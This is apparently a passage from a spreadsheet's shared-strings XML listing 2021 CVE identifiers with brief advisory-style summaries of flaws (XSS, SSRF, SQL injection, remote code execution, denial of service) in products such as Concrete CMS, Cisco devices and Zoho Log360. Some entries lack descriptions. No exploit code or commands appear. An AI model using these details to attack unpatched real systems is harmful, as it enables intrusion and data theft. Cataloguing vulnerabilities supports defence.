  <si>
    <t>An issue was discovered in PrimeKey EJBCA before 7.6.0. CMP RA Mode can be configured to use a known client certificate to authenticate enrolling clients. The same RA client certificate is used for revocation requests as well. While enrollment enforces multi tenancy constraints (by verifying that the client certificate has access to the CA and Profiles being enrolled against), this check was not performed when authenticating revocation operations, allowing a known tenant to revoke a certificate belonging to another tenant.</t>
  </si>
  <si>
    <t>CVE-2021-40089</t>
  </si>
  <si>
    <t>An issue was discovered in PrimeKey EJBCA before 7.6.0. The General Purpose Custom Publisher, which is normally run to invoke a local script upon a publishing operation, was still able to run if the System Configuration setting Enable External Script Access was disabled. With this setting disabled it's not possible to create new such publishers, but existing publishers would continue to run.</t>
  </si>
  <si>
    <t>CVE-2021-4009</t>
  </si>
  <si>
    <t>A flaw was found in xorg-x11-server in versions before 21.1.2 and before 1.20.14. An out-of-bounds access can occur in the SProcXFixesCreatePointerBarrier function. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-40091</t>
  </si>
  <si>
    <t>An SSRF issue was discovered in SquaredUp for SCOM 5.2.1.6654.</t>
  </si>
  <si>
    <t>CVE-2021-40092</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in Image Tile in SquaredUp for SCOM 5.2.1.6654 allows remote attackers to inject arbitrary web script or HTML via an SVG file.</t>
  </si>
  <si>
    <t>CVE-2021-40093</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in integration configuration in SquaredUp for SCOM 5.2.1.6654 allows remote attackers to inject arbitrary web script or HTML via dashboard actions.</t>
  </si>
  <si>
    <t>CVE-2021-40094</t>
  </si>
  <si>
    <t>A DOM-based XSS vulnerability affects SquaredUp for SCOM 5.2.1.6654. If successfully exploited, this vulnerability may allow attackers to inject malicious code into a user's device.</t>
  </si>
  <si>
    <t>CVE-2021-40095</t>
  </si>
  <si>
    <t>An issue was discovered in SquaredUp for SCOM 5.2.1.6654. The Download Log feature in System / Maintenance was susceptible to a local file inclusion vulnerability (when processing remote input in the log files downloaded by an authenticated administrator user), leading to the ability to read arbitrary files on the server filesystems.</t>
  </si>
  <si>
    <t>CVE-2021-40096</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in integration configuration in SquaredUp for SCOM 5.2.1.6654 allows remote attackers to inject arbitrary web script or HTML via modification of the authorisationUrl in some integration configurations.</t>
  </si>
  <si>
    <t>CVE-2021-40097</t>
  </si>
  <si>
    <t>An issue was discovered in Concrete CMS through 8.5.5. Authenticated path traversal leads to to remote code execution via uploaded PHP code, related to the bFilename parameter.</t>
  </si>
  <si>
    <t>CVE-2021-40098</t>
  </si>
  <si>
    <t>An issue was discovered in Concrete CMS through 8.5.5. Path Traversal leading to RCE via external form by adding a regular expression.</t>
  </si>
  <si>
    <t>CVE-2021-40099</t>
  </si>
  <si>
    <t>An issue was discovered in Concrete CMS through 8.5.5. Fetching the update json scheme over HTTP leads to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-4010</t>
  </si>
  <si>
    <t>A flaw was found in xorg-x11-server in versions before 21.1.2 and before 1.20.14. An out-of-bounds access can occur in the SProcScreenSaverSuspend function. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-40100</t>
  </si>
  <si>
    <t>An issue was discovered in Concrete CMS through 8.5.5. Stored XSS can occur in Conversations when the Active Conversation Editor is set to Rich Text.</t>
  </si>
  <si>
    <t>CVE-2021-40101</t>
  </si>
  <si>
    <t>An issue was discovered in Concrete CMS before 8.5.7. The Dashboard allows a user's password to be changed without a prompt for the current password.</t>
  </si>
  <si>
    <t>CVE-2021-40102</t>
  </si>
  <si>
    <t>An issue was discovered in Concrete CMS through 8.5.5. Arbitrary File deletion can occur via PHAR deserialization in is_dir (PHP Object Injection associated with the __wakeup magic method).</t>
  </si>
  <si>
    <t>CVE-2021-40103</t>
  </si>
  <si>
    <t>An issue was discovered in Concrete CMS through 8.5.5. Path Traversal can lead to Arbitrary File Reading and SSRF.</t>
  </si>
  <si>
    <t>CVE-2021-40104</t>
  </si>
  <si>
    <t>An issue was discovered in Concrete CMS through 8.5.5. There is an SVG sanitizer bypass.</t>
  </si>
  <si>
    <t>CVE-2021-40105</t>
  </si>
  <si>
    <t>An issue was discovered in Concrete CMS through 8.5.5. There is XSS via Markdown Comments.</t>
  </si>
  <si>
    <t>CVE-2021-40106</t>
  </si>
  <si>
    <t>An issue was discovered in Concrete CMS through 8.5.5. There is unauthenticated stored XSS in blog comments via the website field.</t>
  </si>
  <si>
    <t>CVE-2021-40108</t>
  </si>
  <si>
    <t>An issue was discovered in Concrete CMS through 8.5.5. The Calendar is vulnerable to CSRF. ccm_token is not verified on the ccm/calendar/dialogs/event/add/save endpoint.</t>
  </si>
  <si>
    <t>CVE-2021-40109</t>
  </si>
  <si>
    <t>A SSRF issue was discovered in Concrete CMS through 8.5.5. Users can access forbidden files on their local network. A user with permissions to upload files from external sites can upload a URL that redirects to an internal resource of any file type. The redirect is followed and loads the contents of the file from the redirected-to server. Files of disallowed types can be uploaded.</t>
  </si>
  <si>
    <t>CVE-2021-4011</t>
  </si>
  <si>
    <t>A flaw was found in xorg-x11-server in versions before 21.1.2 and before 1.20.14. An out-of-bounds access can occur in the SwapCreateRegister function. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-40110</t>
  </si>
  <si>
    <t>In Apache James, using Jazzer fuzzer, we identified that an IMAP user can craft IMAP LIST commands to orchestrate a Denial Of Service using a vulnerable Regular expression. This affected Apache James prior to 3.6.1 We recommend upgrading to Apache James 3.6.1 or higher , which enforce the use of RE2J regular expression engine to execute regex in linear time without back-tracking.</t>
  </si>
  <si>
    <t>CVE-2021-40111</t>
  </si>
  <si>
    <t>In Apache James, while fuzzing with Jazzer the IMAP parsing stack, we discover that crafted APPEND and STATUS IMAP command could be used to trigger infinite loops resulting in expensive CPU computations and OutOfMemory exceptions. This can be used for a Denial Of Service attack. The IMAP user needs to be authenticated to exploit this vulnerability. This affected Apache James prior to version 3.6.1. This vulnerability had been patched in Apache James 3.6.1 and higher. We recommend the upgrade.</t>
  </si>
  <si>
    <t>CVE-2021-40112</t>
  </si>
  <si>
    <t>CVE-2021-40113</t>
  </si>
  <si>
    <t>CVE-2021-40114</t>
  </si>
  <si>
    <t>Multiple Cisco products are affected by a vulnerability in the way the Snort detection engine processes ICMP traffic that could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper memory resource management while the Snort detection engine is processing ICMP packets. An attacker could exploit this vulnerability by sending a series of ICMP packets through an affected device. A successful exploit could allow the attacker to exhaust resources on the affected device, causing the device to reload.</t>
  </si>
  <si>
    <t>CVE-2021-40115</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Webex Video Mesh could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2021-40116</t>
  </si>
  <si>
    <t>Multiple Cisco products are affected by a vulnerability in Snort rules that could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.The vulnerability is due to improper handling of the Block with Reset or Interactive Block with Reset actions if a rule is configured without proper constraints. An attacker could exploit this vulnerability by sending a crafted IP packet to the affected device. A successful exploit could allow the attacker to cause through traffic to be dropped. Note: Only products with Snort3 configured and either a rule with Block with Reset or Interactive Block with Reset actions configured are vulnerable. Products configured with Snort2 are not vulnerable.</t>
  </si>
  <si>
    <t>CVE-2021-40117</t>
  </si>
  <si>
    <t>A vulnerability in SSL/TLS message handler for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability exists because incoming SSL/TLS packets are not properly processed. An attacker could exploit this vulnerability by sending a crafted SSL/TLS packet to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2021-40118</t>
  </si>
  <si>
    <t>CVE-2021-40119</t>
  </si>
  <si>
    <t>A vulnerability in the key-based SSH authentication mechanism of Cisco Policy Suite could allow an unauthenticated, remote attacker to log in to an affected system as the root user. This vulnerability is due to the re-use of static SSH keys across installations. An attacker could exploit this vulnerability by extracting a key from a system under their control. A successful exploit could allow the attacker to log in to an affected system as the root user.</t>
  </si>
  <si>
    <t>CVE-2021-40120</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of certain Cisco Small Business RV Series Routers could allow an authenticated, remote attacker with administrative privileges to inject arbitrary commands into the underlying operating system and execute them using root-level privileges. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious input to a specific field in the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux operating system as a user with root-level privileges.</t>
  </si>
  <si>
    <t>CVE-2021-40121</t>
  </si>
  <si>
    <t>CVE-2021-40122</t>
  </si>
  <si>
    <t>A vulnerability in an API of the Call Bridge feature of Cisco Meeting Server could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. This vulnerability is due to improper handling of large series of message requests. An attacker could exploit this vulnerability by sending a series of messages to the vulnerable API. A successful exploit could allow the attacker to cause the affected device to reload, dropping all ongoing calls and resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2021-40123</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker with administrative read-only privileges to download files that should be restricted. This vulnerability is due to incorrect permissions settings on an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request to the device. A successful exploit could allow the attacker to download files that should be restricted.</t>
  </si>
  <si>
    <t>CVE-2021-40124</t>
  </si>
  <si>
    <t>A vulnerability in the Network Access Manager (NAM) module of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to escalate privileges on an affected device. This vulnerability is due to incorrect privilege assignment to scripts executed before user logon. An attacker could exploit this vulnerability by configuring a script to be executed before logon. A successful exploit could allow the attacker to execute arbitrary code with SYSTEM privileges.</t>
  </si>
  <si>
    <t>CVE-2021-40125</t>
  </si>
  <si>
    <t>A vulnerability in the Internet Key Exchange Version 2 (IKEv2) implementation of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to trigger a denial of service (DoS) condition on an affected device. This vulnerability is due to improper control of a resource. An attacker with the ability to spoof a trusted IKEv2 site-to-site VPN peer and in possession of valid IKEv2 credentials for that peer could exploit this vulnerability by sending malformed, authenticated IKEv2 messages to an affected device. A successful exploit could allow the attacker to trigger a reload of the device.</t>
  </si>
  <si>
    <t>CVE-2021-40126</t>
  </si>
  <si>
    <t>A vulnerability in the web-based dashboard of Cisco Umbrella could allow an authenticated, remote attacker to perform an email enumeration attack against the Umbrella infrastructure. This vulnerability is due to an overly descriptive error message on the dashboard that appears when a user attempts to modify their email address when the new address already exists in the system. An attacker could exploit this vulnerability by attempting to modify the user's email address. A successful exploit could allow the attacker to enumerate email addresses of users in the system.</t>
  </si>
  <si>
    <t>CVE-2021-40127</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Small Business 200 Series Smart Switches, Cisco Small Business 300 Series Managed Switches, and Cisco Small Business 500 Series Stackable Managed Switches could allow an unauthenticated, remote attacker to render the web-based management interface unusable, resulting in a denial of service (DoS) condition. This vulnerability is due to improper validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to cause a permanent invalid redirect for requests sent to the web-based management interface of the device, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2021-40128</t>
  </si>
  <si>
    <t>A vulnerability in the account activation feature of Cisco Webex Meetings could allow an unauthenticated, remote attacker to send an account activation email with an activation link that points to an arbitrary domain. This vulnerability is due to insufficient validation of user-supplied parameters. An attacker could exploit this vulnerability by sending a crafted HTTP request to the account activation page of Cisco Webex Meetings. A successful exploit could allow the attacker to send to any recipient an account activation email that contains a tampered activation link, which could direct the user to an attacker-controlled website.</t>
  </si>
  <si>
    <t>CVE-2021-40129</t>
  </si>
  <si>
    <t>A vulnerability in the configuration dashboard of Cisco Common Services Platform Collector (CSPC) could allow an authenticated, remote attacker to submit a SQL query through the CSPC configuration dashboard. This vulnerability is due to insufficient input validation of uploaded files. An attacker could exploit this vulnerability by uploading a file containing a SQL query to the configuration dashboard. A successful exploit could allow the attacker to read restricted information from the CSPC SQL database.</t>
  </si>
  <si>
    <t>CVE-2021-40130</t>
  </si>
  <si>
    <t>A vulnerability in the web application of Cisco Common Services Platform Collector (CSPC) could allow an authenticated, remote attacker to specify non-log files as sources for syslog reporting. This vulnerability is due to improper restriction of the syslog configuration. An attacker could exploit this vulnerability by configuring non-log files as sources for syslog reporting through the web application. A successful exploit could allow the attacker to read non-log files on the CSPC.</t>
  </si>
  <si>
    <t>CVE-2021-40131</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Common Services Platform Collector (CSPC) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability is due to insufficient validation of user-supplied input that is processed by the web-based management interface. An attacker could exploit this vulnerability by adding malicious code to the configuration by using the web-based management interface. A successful exploit could allow the attacker to execute arbitrary code in the context of the interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2021-40142</t>
  </si>
  <si>
    <t>In OPC Foundation Local Discovery Server (LDS) before 1.04.402.463, remote attackers can cause a denial of service (DoS) by sending carefully crafted messages that lead to Access of a Memory Location After the End of a Buffer.</t>
  </si>
  <si>
    <t>CVE-2021-40143</t>
  </si>
  <si>
    <t>Sonatype Nexus Repository 3.x through 3.33.1-01 is vulnerable to an HTTP header injection. By sending a crafted HTTP request, a remote attacker may disclose sensitive information or request external resources from a vulnerable instance.</t>
  </si>
  <si>
    <t>CVE-2021-40145</t>
  </si>
  <si>
    <t>** DISPUTED ** gdImageGd2Ptr in gd_gd2.c in the GD Graphics Library (aka LibGD) through 2.3.2 has a double free. NOTE: the vendor's position is "The GD2 image format is a proprietary image format of libgd. It has to be regarded as being obsolete, and should only be used for development and testing purposes."</t>
  </si>
  <si>
    <t>CVE-2021-40146</t>
  </si>
  <si>
    <t>A Remote Code Execution (RCE) vulnerability was discovered in the Any23 YAMLExtractor.java file and is known to affect Any23 versions &lt; 2.5. RCE vulnerabilities allow a malicious actor to execute any code of their choice on a remote machine over LAN, WAN, or internet. RCE belongs to the broader class of arbitrary code execution (ACE) vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2021-40147</t>
  </si>
  <si>
    <t>EmTec ZOC before 8.02.2 allows \e[201~ pastes, a different vulnerability than CVE-2021-32198.</t>
  </si>
  <si>
    <t>CVE-2021-40148</t>
  </si>
  <si>
    <t>In Modem EMM, there is a possible information disclosure due to a missing data encryption. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY00716585; Issue ID: ALPS05886933.</t>
  </si>
  <si>
    <t>CVE-2021-40149</t>
  </si>
  <si>
    <t>The web server of the E1 Zoom camera through 3.0.0.716 discloses its SSL private key via the root web server directory. In this way an attacker can download the entire key via the /self.key URI.</t>
  </si>
  <si>
    <t>CVE-2021-4015</t>
  </si>
  <si>
    <t>CVE-2021-40150</t>
  </si>
  <si>
    <t>The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. In this way an attacker can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf URI.</t>
  </si>
  <si>
    <t>CVE-2021-40153</t>
  </si>
  <si>
    <t>squashfs_opendir in unsquash-1.c in Squashfs-Tools 4.5 stores the filename in the directory entry; this is then used by unsquashfs to create the new file during the unsquash. The filename is not validated for traversal outside of the destination directory, and thus allows writing to locations outside of the destination.</t>
  </si>
  <si>
    <t>CVE-2021-40154</t>
  </si>
  <si>
    <t>NXP LPC55S69 devices before A3 have a buffer over-read via a crafted wlength value in a GET Descriptor Configuration request during use of USB In-System Programming (ISP) mode. This discloses protected flash memory.</t>
  </si>
  <si>
    <t>CVE-2021-40155</t>
  </si>
  <si>
    <t>A maliciously crafted DWG file in Autodesk Navisworks 2019, 2020, 2021, 2022 can be forced to read beyond allocated boundaries when parsing the DWG files. This vulnerability can be exploited to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-40156</t>
  </si>
  <si>
    <t>A maliciously crafted DWG file in Autodesk Navisworks 2019, 2020, 2021, 2022 can be forced to write beyond allocated boundaries when parsing the DWG files. This vulnerability can be exploited to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-40157</t>
  </si>
  <si>
    <t>A user may be tricked into opening a malicious FBX file which may exploit an Untrusted Pointer Dereference vulnerability in FBX’s Review version 1.5.0 and prior causing it to run arbitrary code on the system.</t>
  </si>
  <si>
    <t>CVE-2021-40158</t>
  </si>
  <si>
    <t>A maliciously crafted JT file in Autodesk Inventor 2022, 2021, 2020, 2019 and AutoCAD 2022 may be forced to read beyond allocated boundaries when parsing the JT file. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-40159</t>
  </si>
  <si>
    <t>An Information Disclosure vulnerability for JT files in Autodesk Inventor 2022, 2021, 2020, 2019 in conjunction with other vulnerabilities may lead to code execution through maliciously crafted JT files in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-4016</t>
  </si>
  <si>
    <t>Rapid7 Insight Agent, versions prior to 3.1.3, suffer from an improper access control vulnerability whereby, the user has access to the snapshot directory. An attacker can access, read and copy any of the files in this directory e.g. asset_info.json or file_info.json, leading to a loss of confidentiality. This issue was fixed in Rapid7 Insight Agent 3.1.3.</t>
  </si>
  <si>
    <t>CVE-2021-40160</t>
  </si>
  <si>
    <t>PDFTron prior to 9.0.7 version may be forced to read beyond allocated boundaries when parsing a maliciously crafted PDF file. This vulnerability can be exploited to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-40161</t>
  </si>
  <si>
    <t>A Memory Corruption vulnerability may lead to code execution through maliciously crafted DLL files through PDFTron earlier than 9.0.7 version.</t>
  </si>
  <si>
    <t>CVE-2021-40162</t>
  </si>
  <si>
    <t>A maliciously crafted TIF, PICT, TGA, or RLC files in Autodesk Image Processing component may be forced to read beyond allocated boundaries when parsing the TIFF, PICT, TGA, or RLC files. This vulnerability may be exploited to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-40163</t>
  </si>
  <si>
    <t>A Memory Corruption vulnerability may lead to code execution through maliciously crafted DLL files through Autodesk Image Processing component.</t>
  </si>
  <si>
    <t>CVE-2021-40164</t>
  </si>
  <si>
    <t>A heap-based buffer overflow could occur while parsing TIFF, PICT, TGA, or RLC files. This vulnerability may be exploited to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-40165</t>
  </si>
  <si>
    <t>A maliciously crafted TIFF, PICT, TGA, or RLC file in Autodesk Image Processing component may be used to write beyond the allocated buffer while parsing TIFF, PICT, TGA, or RLC files. This vulnerability may be exploited to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-40166</t>
  </si>
  <si>
    <t>A maliciously crafted PNG file in Autodesk Image Processing component may be used to attempt to free an object that has already been freed while parsing them. This vulnerability may be exploited by attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-40167</t>
  </si>
  <si>
    <t>A malicious crafted dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-4017</t>
  </si>
  <si>
    <t>CVE-2021-40170</t>
  </si>
  <si>
    <t>An RF replay attack vulnerability in the SecuritasHome home alarm system, version HPGW-G 0.0.2.23F BG_U-ITR-F1-BD_BL.A30.20181117, allows an attacker to trigger arbitrary system functionality by replaying previously recorded signals. This lets an adversary, among other things, disarm an armed system.</t>
  </si>
  <si>
    <t>CVE-2021-40171</t>
  </si>
  <si>
    <t>The absence of notifications regarding an ongoing RF jamming attack in the SecuritasHome home alarm system, version HPGW-G 0.0.2.23F BG_U-ITR-F1-BD_BL.A30.20181117, allows an attacker to block legitimate traffic while not alerting the owner of the system.</t>
  </si>
  <si>
    <t>CVE-2021-40172</t>
  </si>
  <si>
    <t>Zoho ManageEngine Log360 before Build 5219 allows a CSRF attack on proxy settings.</t>
  </si>
  <si>
    <t>CVE-2021-40173</t>
  </si>
  <si>
    <t>Zoho ManageEngine Cloud Security Plus before Build 4117 allows a CSRF attack on the server proxy settings.</t>
  </si>
  <si>
    <t>CVE-2021-40174</t>
  </si>
  <si>
    <t>Zoho ManageEngine Log360 before Build 5224 allows a CSRF attack for disabling the logon security settings.</t>
  </si>
  <si>
    <t>CVE-2021-40175</t>
  </si>
  <si>
    <t>Zoho ManageEngine Log360 before Build 5219 allows unrestricted file upload with resultant remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-40176</t>
  </si>
  <si>
    <t>Zoho ManageEngine Log360 before Build 5225 allows stored XSS.</t>
  </si>
  <si>
    <t>CVE-2021-40177</t>
  </si>
  <si>
    <t>Zoho ManageEngine Log360 before Build 5225 allows remote code execution via BCP file overwrite.</t>
  </si>
  <si>
    <t>CVE-2021-40178</t>
  </si>
  <si>
    <t>Zoho ManageEngine Log360 before Build 5224 allows stored XSS via the LOGO_PATH key value in the logon settings.</t>
  </si>
  <si>
    <t>CVE-2021-4018</t>
  </si>
  <si>
    <t>CVE-2021-40180</t>
  </si>
  <si>
    <t>In the WeChat application 8.0.10 for Android and iOS, a mini program can obtain sensitive information from a user's address book via wx.searchContacts.</t>
  </si>
  <si>
    <t>CVE-2021-40186</t>
  </si>
  <si>
    <t>The AppCheck research team identified a Server-Side Request Forgery (SSRF) vulnerability within the DNN CMS platform, formerly known as DotNetNuke. SSRF vulnerabilities allow the attacker to exploit the target system to make network requests on their behalf, allowing a range of possible attacks. In the most common scenario, the attacker exploits SSRF vulnerabilities to attack systems behind the firewall and access sensitive information from Cloud Provider metadata services.</t>
  </si>
  <si>
    <t>CVE-2021-40188</t>
  </si>
  <si>
    <t>PHPFusion 9.03.110 is affected by an arbitrary file upload vulnerability. The File Manager function in admin panel does not filter all PHP extensions such as ".php, .php7, .phtml, .php5, ...". An attacker can upload a malicious file and execute code on the server.</t>
  </si>
  <si>
    <t>CVE-2021-40189</t>
  </si>
  <si>
    <t>PHPFusion 9.03.110 is affected by a remote code execution vulnerability. The theme function will extract a file to "webroot/themes/{Theme Folder], where an attacker can access and execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-4019</t>
  </si>
  <si>
    <t>CVE-2021-40191</t>
  </si>
  <si>
    <t>Dzzoffice Version 2.02.1 is affected by cross-site scripting (XSS) due to a lack of sanitization of input data at all upload functions in webroot/dzz/attach/Uploader.class.php and return a wrong response in content-type of output data in webroot/dzz/attach/controller.php.</t>
  </si>
  <si>
    <t>CVE-2021-4020</t>
  </si>
  <si>
    <t>janus-gateway is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</t>
  </si>
  <si>
    <t>CVE-2021-4021</t>
  </si>
  <si>
    <t>A vulnerability was found in Radare2 in versions prior to 5.6.2, 5.6.0, 5.5.4 and 5.5.2. Mapping a huge section filled with zeros of an ELF64 binary for MIPS architecture can lead to uncontrolled resource consumption and DoS.</t>
  </si>
  <si>
    <t>CVE-2021-40212</t>
  </si>
  <si>
    <t>An exploitable out-of-bounds write vulnerability in PotPlayer 1.7.21523 build 210729 may lead to code execution, information disclosure, and denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-40214</t>
  </si>
  <si>
    <t>Gibbon v22.0.00 suffers from a stored XSS vulnerability within the wall messages component.</t>
  </si>
  <si>
    <t>CVE-2021-40219</t>
  </si>
  <si>
    <t>Bolt CMS &lt;= 4.2 is vulnerable to Remote Code Execution. Unsafe theme rendering allows an authenticated attacker to edit theme to inject server-side template injection that leads to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-4022</t>
  </si>
  <si>
    <t>A vulnerability was found in rizin. The bug involves an ELF64 binary for the HPPA architecture. When a specially crafted binarygets analysed by rizin, it causes rizin to crash by freeing an uninitialized (and potentially user controlled, depending on the build) memory address.</t>
  </si>
  <si>
    <t>CVE-2021-40222</t>
  </si>
  <si>
    <t>Rittal CMC PU III Web management Version affected: V3.11.00_2. Version fixed: V3.17.10 is affected by a remote code execution vulnerablity. It is possible to introduce shell code to create a reverse shell in the PU-Hostname field of the TCP/IP Configuration dialog. Web application fails to sanitize user input on Network TCP/IP configuration page. This allows the attacker to inject commands as root on the device which will be executed once the data is received.</t>
  </si>
  <si>
    <t>CVE-2021-40223</t>
  </si>
  <si>
    <t>Rittal CMC PU III Web management (version V3.11.00_2) fails to sanitize user input on several parameters of the configuration (User Configuration dialog, Task Configuration dialog and set logging filter dialog). This allows an attacker to backdoor the device with HTML and browser-interpreted content (such as JavaScript or other client-side scripts). The XSS payload will be triggered when the user accesses some specific sections of the application.</t>
  </si>
  <si>
    <t>CVE-2021-40226</t>
  </si>
  <si>
    <t>xpdfreader 4.03 is vulnerable to Buffer Overflow.</t>
  </si>
  <si>
    <t>CVE-2021-4023</t>
  </si>
  <si>
    <t>A flaw was found in the io-workqueue implementation in the Linux kernel versions prior to 5.15-rc1. The kernel can panic when an improper cancellation operation triggers the submission of new io-uring operations during a shortage of free space. This flaw allows a local user with permissions to execute io-uring requests to possibly crash the system.</t>
  </si>
  <si>
    <t>CVE-2021-40238</t>
  </si>
  <si>
    <t>A Cross Site Scriptiong (XSS) vulnerability exists in the admin panel in Webuzo &lt; 2.9.0 via an HTTP request to a non-existent page, which is activated by administrators viewing the "Error Log" page. An attacker can leverage this to achieve Unauthenticated Remote Code Execution via the "Cron Jobs" functionality of Webuzo.</t>
  </si>
  <si>
    <t>CVE-2021-40239</t>
  </si>
  <si>
    <t>A Buffer Overflow vulnerability exists in the latest version of Miniftpd in the do_retr function in ftpproto.c</t>
  </si>
  <si>
    <t>CVE-2021-4024</t>
  </si>
  <si>
    <t>A flaw was found in podman. The `podman machine` function (used to create and manage Podman virtual machine containing a Podman process) spawns a `gvproxy` process on the host system. The `gvproxy` API is accessible on port 7777 on all IP addresses on the host. If that port is open on the host's firewall, an attacker can potentially use the `gvproxy` API to forward ports on the host to ports in the VM, making private services on the VM accessible to the network. This issue could be also used to interrupt the host's services by forwarding all ports to the VM.</t>
  </si>
  <si>
    <t>CVE-2021-40241</t>
  </si>
  <si>
    <t>xfig 3.2.7 is vulnerable to Buffer Overflow.</t>
  </si>
  <si>
    <t>CVE-2021-40247</t>
  </si>
  <si>
    <t>SQL injection vulnerability in Sourcecodester Budget and Expense Tracker System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username field.</t>
  </si>
  <si>
    <t>CVE-2021-4026</t>
  </si>
  <si>
    <t>bookstack is vulnerable to Improper Access Control</t>
  </si>
  <si>
    <t>CVE-2021-40260</t>
  </si>
  <si>
    <t>Multiple Cross Site Scripting (XSS) vulnerabilities exist in SourceCodester Tailor Management 1.0 via the (1) eid parameter in (a) partedit.php and (b) customeredit.php, the (2) id parameter in (a) editmeasurement.php and (b) addpayment.php, and the (3) error parameter in index.php.</t>
  </si>
  <si>
    <t>CVE-2021-40261</t>
  </si>
  <si>
    <t>Multiple Cross Site Scripting (XSS) vulnerabilities exist in SourceCodester CASAP Automated Enrollment System 1.0 via the (1) user_username and (2) category parameters in save_class.php, the (3) firstname, (4) class, and (5) status parameters in student_table.php, the (6) category and (7) class_name parameters in add_class1.php, the (8) fname, (9) mname,(10) lname, (11) address, (12) class, (13) gfname, (14) gmname, (15) glname, (16) rship, (17) status, (18) transport, and (19) route parameters in add_student.php, the (20) fname, (21) mname, (22) lname, (23) address, (24) class, (25) fgname, (26) gmname, (27) glname, (28) rship, (29) status, (30) transport, and (31) route parameters in save_stud.php,the (32) status, (33) fname, and (34) lname parameters in add_user.php, the (35) username, (36) firstname, and (37) status parameters in users.php, the (38) fname, (39) lname, and (40) status parameters in save_user.php, and the (41) activity_log, (42) aprjun, (43) class, (44) janmar, (45) Julsep,(46) octdec, (47) Students and (48) users parameters in table_name.</t>
  </si>
  <si>
    <t>CVE-2021-40272</t>
  </si>
  <si>
    <t>OP5 Monitor 8.3.1, 8.3.2, and OP5 8.3.3 are vulnerable to Cross Site Scripting (XSS).</t>
  </si>
  <si>
    <t>CVE-2021-40279</t>
  </si>
  <si>
    <t>An SQL Injection vulnerability exists in zzcms 8.2, 8.3, 2020, and 2021 via the id parameter in admin/bad.php.</t>
  </si>
  <si>
    <t>CVE-2021-4028</t>
  </si>
  <si>
    <t>A flaw in the Linux kernel's implementation of RDMA communications manager listener code allowed an attacker with local access to setup a socket to listen on a high port allowing for a list element to be used after free. Given the ability to execute code, a local attacker could leverage this use-after-free to crash the system or possibly escalate privileges on the system.</t>
  </si>
  <si>
    <t>CVE-2021-40280</t>
  </si>
  <si>
    <t>An SQL Injection vulnerablitly exits in zzcms 8.2, 8.3, 2020, and 2021 via the id parameter in admin/dl_sendmail.php.</t>
  </si>
  <si>
    <t>CVE-2021-40281</t>
  </si>
  <si>
    <t>An SQL Injection vulnerability exists in zzcms 8.2, 8.3, 2020, and 2021 in dl/dl_print.php when registering ordinary users.</t>
  </si>
  <si>
    <t>CVE-2021-40282</t>
  </si>
  <si>
